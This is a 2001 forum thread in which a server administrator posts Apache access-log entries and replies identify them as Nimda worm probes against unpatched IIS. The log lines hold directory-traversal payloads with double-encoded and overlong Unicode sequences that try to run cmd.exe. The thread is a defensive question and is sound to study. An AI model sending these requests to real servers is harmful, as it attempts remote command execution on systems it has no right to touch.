httpd/access entries

Gert Andersen

httpd/access entries

« on: November 27, 2001, 11:53:18 AM »

Hi

I have these entries in my access-log. Could someone please interpret these lines. I have a lot of of these entries.
Thanks
--------------------------------------------------------------------
www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:13 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:15 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:16 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:17 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:19 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:20 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

www.mydomain.com xxx.yyy.zzzz.vvv- - [27/Nov/2001:09:41:21 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"

-
-
-

Logged

WXP

Re: httpd/access entries

« Reply #1 on: November 27, 2001, 12:14:34 PM »

I cant help you much but it seems like a IIS worm is trying to do some stuff

> GET /c/winnt/system32/cmd.exe?/c+dir

Don't worry Apache is untouchable !

Cya

Logged

Jon Blakely

Re: httpd/access entries

« Reply #2 on: November 27, 2001, 12:38:28 PM »

Its the Nimda Worm. As WXP has said it only affects unpatched Microsoft IIS servers.
Apart from being a waste of bandwidth and log space it is harmless.

Jon

Logged